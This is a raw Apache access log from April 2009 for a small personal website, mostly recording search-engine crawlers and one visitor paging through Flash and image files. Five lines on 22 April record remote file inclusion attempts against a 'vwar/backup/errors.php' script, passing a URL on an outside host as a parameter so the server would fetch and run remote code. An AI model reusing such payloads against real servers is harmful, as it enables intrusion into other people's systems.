65.55.231.58 - - [20/Apr/2009:12:50:03 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 214 603
65.55.231.58 - - [20/Apr/2009:12:50:03 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 396 154085
81.6.253.159 - - [20/Apr/2009:15:12:00 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)" 375 642
66.249.72.141 - - [20/Apr/2009:19:21:08 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.72.141 - - [20/Apr/2009:19:21:08 +0100] "GET /webalizer/usage_200707.html HTTP/1.1" 200 150873 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 151236
77.46.194.139 - - [20/Apr/2009:20:36:33 +0100] "GET / HTTP/1.1" 200 1266 "http://astore.amazon.com/buy_oxygen_concentrator-20" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 259 1625
66.249.72.141 - - [20/Apr/2009:21:42:23 +0100] "GET /decodeine.htm HTTP/1.1" 404 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 244 644
78.16.216.72 - - [20/Apr/2009:22:54:44 +0100] "GET /feidad.html HTTP/1.1" 200 820 "http://www.google.ie/search?hl=en&q=architectural+pathology+krasso&btnG=Search&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 553 1178
78.16.216.72 - - [20/Apr/2009:22:54:45 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.decodeine.com/feidad.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 340 7503734
78.16.216.72 - - [20/Apr/2009:22:55:10 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 243 641
78.16.216.72 - - [20/Apr/2009:22:57:39 +0100] "GET /o1.jpg HTTP/1.1" 200 258267 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 364 258631
78.16.216.72 - - [20/Apr/2009:22:57:45 +0100] "GET /o2.jpg HTTP/1.1" 200 216322 "http://www.decodeine.com/o1.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 361 216685
78.16.216.72 - - [20/Apr/2009:22:57:51 +0100] "GET /o3.jpg HTTP/1.1" 200 153363 "http://www.decodeine.com/o2.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 361 153726
78.16.216.72 - - [20/Apr/2009:22:57:56 +0100] "GET /o4.jpg HTTP/1.1" 200 34271 "http://www.decodeine.com/o3.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 361 34632
78.16.216.72 - - [20/Apr/2009:22:58:00 +0100] "GET /o5.jpg HTTP/1.1" 200 60308 "http://www.decodeine.com/o4.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 361 60670
78.16.216.72 - - [20/Apr/2009:22:58:10 +0100] "GET /o8.jpg HTTP/1.1" 200 221331 "http://www.decodeine.com/o5.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 361 221695
78.16.216.72 - - [20/Apr/2009:22:58:13 +0100] "GET /o6.jpg HTTP/1.1" 200 70616 "http://www.decodeine.com/o8.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 361 70979
78.16.216.72 - - [20/Apr/2009:22:58:16 +0100] "GET /o7.jpg HTTP/1.1" 200 129833 "http://www.decodeine.com/o6.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 361 130197
78.16.216.72 - - [20/Apr/2009:22:58:24 +0100] "GET /o9.jpg HTTP/1.1" 200 142448 "http://www.decodeine.com/o8.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 361 142812
78.16.216.72 - - [20/Apr/2009:22:58:27 +0100] "GET /o10.jpg HTTP/1.1" 200 59922 "http://www.decodeine.com/o9.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 362 60284
78.16.216.72 - - [20/Apr/2009:22:58:34 +0100] "GET /o11.jpg HTTP/1.1" 200 58591 "http://www.decodeine.com/o10.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 58953
78.16.216.72 - - [20/Apr/2009:22:58:37 +0100] "GET /o12.jpg HTTP/1.1" 404 354 "http://www.decodeine.com/o11.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 637
78.16.216.72 - - [20/Apr/2009:22:58:49 +0100] "GET /o13.jpg HTTP/1.1" 200 76280 "http://www.decodeine.com/o11.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 76642
78.16.216.72 - - [20/Apr/2009:22:58:53 +0100] "GET /oa1.jpg HTTP/1.1" 404 354 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 637
78.16.216.72 - - [20/Apr/2009:22:58:58 +0100] "GET /Pier.avi HTTP/1.1" 404 355 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 500 638
78.16.216.72 - - [20/Apr/2009:22:59:22 +0100] "GET /eh1.jpg HTTP/1.1" 200 66657 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 67021
78.16.216.72 - - [20/Apr/2009:22:59:25 +0100] "GET /eh2.jpg HTTP/1.1" 200 65677 "http://www.decodeine.com/eh1.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 66040
78.16.216.72 - - [20/Apr/2009:22:59:29 +0100] "GET /eh3.jpg HTTP/1.1" 200 65131 "http://www.decodeine.com/eh2.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 65492
78.16.216.72 - - [20/Apr/2009:22:59:31 +0100] "GET /eh4.jpg HTTP/1.1" 200 58088 "http://www.decodeine.com/eh3.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 58449
78.16.216.72 - - [20/Apr/2009:22:59:33 +0100] "GET /eh5.jpg HTTP/1.1" 200 52657 "http://www.decodeine.com/eh4.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 53018
78.16.216.72 - - [20/Apr/2009:22:59:36 +0100] "GET /eh6.jpg HTTP/1.1" 200 191123 "http://www.decodeine.com/eh5.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 191486
78.16.216.72 - - [20/Apr/2009:22:59:38 +0100] "GET /eh7.jpg HTTP/1.1" 200 108297 "http://www.decodeine.com/eh6.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 108660
78.16.216.72 - - [20/Apr/2009:22:59:40 +0100] "GET /eh8.jpg HTTP/1.1" 200 122868 "http://www.decodeine.com/eh7.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 123231
78.16.216.72 - - [20/Apr/2009:22:59:42 +0100] "GET /eh9.jpg HTTP/1.1" 200 127505 "http://www.decodeine.com/eh8.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 363 127868
78.16.216.72 - - [20/Apr/2009:22:59:44 +0100] "GET /eh10.jpg HTTP/1.1" 200 105670 "http://www.decodeine.com/eh9.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 364 106033
78.16.216.72 - - [20/Apr/2009:22:59:47 +0100] "GET /eh11.jpg HTTP/1.1" 200 120922 "http://www.decodeine.com/eh10.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 121285
78.16.216.72 - - [20/Apr/2009:22:59:48 +0100] "GET /eh12.jpg HTTP/1.1" 200 125271 "http://www.decodeine.com/eh11.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 125635
78.16.216.72 - - [20/Apr/2009:22:59:50 +0100] "GET /eh13.jpg HTTP/1.1" 200 141379 "http://www.decodeine.com/eh12.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 141743
78.16.216.72 - - [20/Apr/2009:22:59:52 +0100] "GET /eh14.jpg HTTP/1.1" 200 111982 "http://www.decodeine.com/eh13.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 112346
78.16.216.72 - - [20/Apr/2009:22:59:54 +0100] "GET /eh15.jpg HTTP/1.1" 200 130288 "http://www.decodeine.com/eh14.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 130651
78.16.216.72 - - [20/Apr/2009:22:59:55 +0100] "GET /eh16.jpg HTTP/1.1" 200 70919 "http://www.decodeine.com/eh15.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 71281
78.16.216.72 - - [20/Apr/2009:22:59:58 +0100] "GET /eh17.jpg HTTP/1.1" 200 131211 "http://www.decodeine.com/eh16.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 131574
78.16.216.72 - - [20/Apr/2009:23:00:00 +0100] "GET /eh18.jpg HTTP/1.1" 200 119010 "http://www.decodeine.com/eh17.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 119373
78.16.216.72 - - [20/Apr/2009:23:00:03 +0100] "GET /eh19.jpg HTTP/1.1" 200 64514 "http://www.decodeine.com/eh18.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 64875
78.16.216.72 - - [20/Apr/2009:23:00:05 +0100] "GET /eh20.jpg HTTP/1.1" 200 70528 "http://www.decodeine.com/eh19.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 70890
78.16.216.72 - - [20/Apr/2009:23:01:31 +0100] "GET /eha1.jpg HTTP/1.1" 404 355 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 366 639
78.16.216.72 - - [20/Apr/2009:23:01:34 +0100] "GET /Hospital.avi HTTP/1.1" 404 359 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 504 642
78.16.216.72 - - [20/Apr/2009:23:01:55 +0100] "GET /hs01.jpg HTTP/1.1" 200 58624 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 366 58986
78.16.216.72 - - [20/Apr/2009:23:01:57 +0100] "GET /hs02.jpg HTTP/1.1" 200 24937 "http://www.decodeine.com/hs01.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 25298
78.16.216.72 - - [20/Apr/2009:23:01:59 +0100] "GET /hs03.jpg HTTP/1.1" 200 117599 "http://www.decodeine.com/hs02.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 117962
78.16.216.72 - - [20/Apr/2009:23:02:01 +0100] "GET /hs04.jpg HTTP/1.1" 200 70913 "http://www.decodeine.com/hs03.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 71275
78.16.216.72 - - [20/Apr/2009:23:02:04 +0100] "GET /hs05.jpg HTTP/1.1" 200 29807 "http://www.decodeine.com/hs04.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 30168
78.16.216.72 - - [20/Apr/2009:23:02:06 +0100] "GET /hs06.jpg HTTP/1.1" 200 77326 "http://www.decodeine.com/hs05.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 77688
78.16.216.72 - - [20/Apr/2009:23:02:08 +0100] "GET /hs07.jpg HTTP/1.1" 200 49592 "http://www.decodeine.com/hs06.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 49953
78.16.216.72 - - [20/Apr/2009:23:02:10 +0100] "GET /hs08.jpg HTTP/1.1" 200 56299 "http://www.decodeine.com/hs07.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 56660
78.16.216.72 - - [20/Apr/2009:23:02:13 +0100] "GET /hs09.jpg HTTP/1.1" 200 39779 "http://www.decodeine.com/hs08.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 40140
78.16.216.72 - - [20/Apr/2009:23:02:17 +0100] "GET /hs10.jpg HTTP/1.1" 200 32110 "http://www.decodeine.com/hs09.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 32471
78.16.216.72 - - [20/Apr/2009:23:02:19 +0100] "GET /hs11.jpg HTTP/1.1" 200 151835 "http://www.decodeine.com/hs10.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 152198
78.16.216.72 - - [20/Apr/2009:23:02:21 +0100] "GET /hs12.jpg HTTP/1.1" 200 143988 "http://www.decodeine.com/hs11.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 144351
78.16.216.72 - - [20/Apr/2009:23:02:23 +0100] "GET /hs13.jpg HTTP/1.1" 200 50131 "http://www.decodeine.com/hs12.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 50492
78.16.216.72 - - [20/Apr/2009:23:02:25 +0100] "GET /hs14.jpg HTTP/1.1" 200 169029 "http://www.decodeine.com/hs13.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 169392
78.16.216.72 - - [20/Apr/2009:23:02:28 +0100] "GET /hs15.jpg HTTP/1.1" 200 40087 "http://www.decodeine.com/hs14.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 40448
78.16.216.72 - - [20/Apr/2009:23:02:29 +0100] "GET /hs16.jpg HTTP/1.1" 200 157251 "http://www.decodeine.com/hs15.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 157614
78.16.216.72 - - [20/Apr/2009:23:02:31 +0100] "GET /hs17.jpg HTTP/1.1" 200 124968 "http://www.decodeine.com/hs16.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 125331
78.16.216.72 - - [20/Apr/2009:23:02:33 +0100] "GET /hs18.jpg HTTP/1.1" 200 123919 "http://www.decodeine.com/hs17.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 124282
78.16.216.72 - - [20/Apr/2009:23:02:38 +0100] "GET /hs19.jpg HTTP/1.1" 200 125900 "http://www.decodeine.com/hs18.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 126263
78.16.216.72 - - [20/Apr/2009:23:02:42 +0100] "GET /hs20.jpg HTTP/1.1" 200 152343 "http://www.decodeine.com/hs19.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 365 152706
58.61.164.207 - - [21/Apr/2009:00:05:56 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 263 641
64.246.165.160 - - [21/Apr/2009:03:56:42 +0100] "GET /robots.txt HTTP/1.0" 404 357 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 212 603
64.246.165.160 - - [21/Apr/2009:03:56:43 +0100] "GET / HTTP/1.1" 206 1266 "http://whois.domaintools.com/decodeine.com" "SurveyBot/2.3 (Whois Source)" 351 1634
58.61.164.140 - - [21/Apr/2009:06:36:27 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.72.141 - - [21/Apr/2009:07:08:15 +0100] "GET /webalizer/hourly_usage_200804.png HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 261 254
88.131.106.11 - - [21/Apr/2009:07:44:13 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 199 603
88.131.106.11 - - [21/Apr/2009:07:44:16 +0100] "GET / HTTP/1.0" 200 1266 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 189 1587
66.249.72.141 - - [21/Apr/2009:07:55:24 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.72.141 - - [21/Apr/2009:07:55:25 +0100] "GET /log/?C=N;O=A HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 293 3455
66.249.72.141 - - [21/Apr/2009:08:35:45 +0100] "GET /webalizer/ctry_usage_200704.png HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 259 254
66.249.72.141 - - [21/Apr/2009:09:15:10 +0100] "GET /log/error.log.3 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 296 255
66.249.72.141 - - [21/Apr/2009:09:27:32 +0100] "GET /bs03.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.72.141 - - [21/Apr/2009:10:07:13 +0100] "GET /bs16.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.72.141 - - [21/Apr/2009:10:46:59 +0100] "GET /bs02.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.72.141 - - [21/Apr/2009:11:05:59 +0100] "GET /webalizer/usage_200904.html HTTP/1.1" 200 144636 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 144999
124.115.0.160 - - [21/Apr/2009:11:35:11 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.72.141 - - [21/Apr/2009:11:50:28 +0100] "GET /webalizer/hourly_usage_200704.png HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 261 254
208.111.154.15 - - [21/Apr/2009:14:41:01 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 195 584
208.111.154.15 - - [21/Apr/2009:14:41:01 +0100] "GET /feidad.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 246 197
208.80.195.32 - - [21/Apr/2009:16:15:03 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; .NET CLR 1.1.4322)" 156 1587
220.181.61.234 - - [21/Apr/2009:19:14:14 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
72.30.65.56 - - [21/Apr/2009:19:21:08 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
72.30.65.56 - - [21/Apr/2009:19:21:08 +0100] "GET /log/error.log.3 HTTP/1.0" 200 611 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 425 933
193.47.80.50 - - [22/Apr/2009:03:42:03 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 260 603
193.47.80.50 - - [22/Apr/2009:03:42:03 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 342 216
114.80.93.71 - - [22/Apr/2009:03:49:54 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.72.141 - - [22/Apr/2009:07:22:53 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.72.141 - - [22/Apr/2009:07:22:53 +0100] "GET /hs06.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
66.249.72.141 - - [22/Apr/2009:07:33:53 +0100] "GET /webalizer/daily_usage_200804.png HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 260 254
200.171.210.195 - - [22/Apr/2009:08:17:54 +0100] "GET ///vwar/backup/errors.php?error=http://brandon420.xpg.com.br/bots/id.txt?? HTTP/1.0" 404 369 "-" "Mozilla/5.0" 289 653
200.171.210.195 - - [22/Apr/2009:08:17:54 +0100] "GET /log///vwar/backup/errors.php?error=http://brandon420.xpg.com.br/bots/id.txt?? HTTP/1.0" 404 375 "-" "Mozilla/5.0" 293 659
200.171.210.195 - - [22/Apr/2009:08:17:54 +0100] "GET /log/web.log///vwar/backup/errors.php?error=http://brandon420.xpg.com.br/bots/id.txt?? HTTP/1.0" 404 383 "-" "Mozilla/5.0" 301 667
200.171.210.195 - - [22/Apr/2009:08:38:19 +0100] "GET /log/error.log%20%20///vwar/backup/errors.php?error=http://brandon420.xpg.com.br/bots/id.txt?? HTTP/1.0" 404 387 "-" "Mozilla/5.0" 309 671
200.171.210.195 - - [22/Apr/2009:08:38:46 +0100] "GET /log/web.log%20%20///vwar/backup/errors.php?error=http://brandon420.xpg.com.br/bots/id.txt?? HTTP/1.0" 404 385 "-" "Mozilla/5.0" 307 669
66.249.72.141 - - [22/Apr/2009:08:50:36 +0100] "GET /ob3.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 235 256
66.249.72.141 - - [22/Apr/2009:09:41:50 +0100] "GET /hs18.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.72.141 - - [22/Apr/2009:10:14:47 +0100] "GET /hs04.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.72.141 - - [22/Apr/2009:10:40:23 +0100] "GET /webalizer/daily_usage_200704.png HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 260 254
38.108.180.133 - - [22/Apr/2009:10:46:01 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" 183 603
38.108.180.133 - - [22/Apr/2009:10:46:01 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" 173 1587
38.108.180.133 - - [22/Apr/2009:10:46:02 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" 184 604
66.249.72.141 - - [22/Apr/2009:11:05:30 +0100] "GET /webalizer/usage_200904.html HTTP/1.1" 200 145532 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 352 145895
66.249.72.141 - - [22/Apr/2009:13:07:40 +0100] "GET /webalizer/ HTTP/1.1" 200 11453 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 291 11815
66.249.72.141 - - [22/Apr/2009:14:07:50 +0100] "GET /log/?C=D;O=D HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 243 3456
66.249.72.141 - - [22/Apr/2009:16:16:15 +0100] "GET /log/web.log.2 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 294 255
66.249.72.141 - - [22/Apr/2009:16:30:53 +0100] "GET /log/?C=S;O=D HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 243 3456
66.249.72.141 - - [22/Apr/2009:17:29:47 +0100] "GET /webalizer/usage_200507.html HTTP/1.1" 200 77340 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 77702
193.52.14.47 - - [22/Apr/2009:17:52:15 +0100] "GET /o1.jpg HTTP/1.1" 200 258267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" 397 258631
193.52.14.47 - - [22/Apr/2009:17:52:17 +0100] "GET /o2.jpg HTTP/1.1" 200 216322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" 397 216685
193.52.14.47 - - [22/Apr/2009:17:51:25 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.google.fr/search?q=quantum+physics+animation+filetype:swf&hl=fr&lr=&rlz=1B3GGGL_frFR282FR291&as_qdr=all&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" 539 6113400
66.249.72.141 - - [22/Apr/2009:20:18:20 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.72.141 - - [22/Apr/2009:20:18:20 +0100] "GET /fdesign%201.swf HTTP/1.1" 404 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 246 643
66.249.72.141 - - [22/Apr/2009:20:18:20 +0100] "GET /CAM.swf HTTP/1.1" 404 354 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 238 637
